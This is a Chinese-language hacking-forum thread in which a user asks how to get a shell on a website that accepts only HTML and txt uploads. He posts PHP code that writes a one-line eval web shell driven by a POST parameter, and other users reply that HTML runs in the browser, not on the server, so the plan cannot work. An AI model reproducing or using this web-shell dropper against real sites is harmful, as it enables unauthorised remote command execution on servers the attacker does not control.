网站能上传HTML和txt，怎么拿shell

weibo

本来想着用html加iframe浮动框架，包含一个远程的php的文件进来，然后php文件执行下面的代码在刚上传的1.html同目录下生成一个一句话文件。。。
可惜思路错误，执行php文件的代码后，并不能在1.html同目录下生成一个一句话文件。分析才发现想法太2，这样执行只能在原来那个php的文件夹下生成一句话文件。。。

[PHP] 纯文本查看 复制代码

<?php
$filename = '1.php';
if (file_exists($filename)) {

} else {
$ft=fopen("1.php",w);
fwrite($ft,'<?php eval ($_POST[cmd]);?>'); 
fclose($ft);
echo "write in";
}
?>

希望各位大大给出比较合适的方法

weibo

快来解答吧各位{:soso_e183:}

Free_小东

{:soso_e127:}哥  这样能拿到shell我就服了你了 能通过html拿shell的方法我至今未见过 因为html不是在服务端运行的

weibo

Free_小东 发表于 2014-7-9 13:22
哥  这样能拿到shell我就服了你了 能通过html拿shell的方法我至今未见过 因为html不是在服务 ...

哥，难道说这个 歪脖树 咱拿不下来了？

huise

我也想知道

星南

你用html包含一个php，能在你拿shell的网站目录下生成出文件，就真见鬼了。

csadsl

拿到了说下，让我学习学习

huc-安阳

你看得懂这段php代码吗，哥{:soso_e153:}，

f4ck009

html不能在服务器端执行的，所以包含进去也执行不了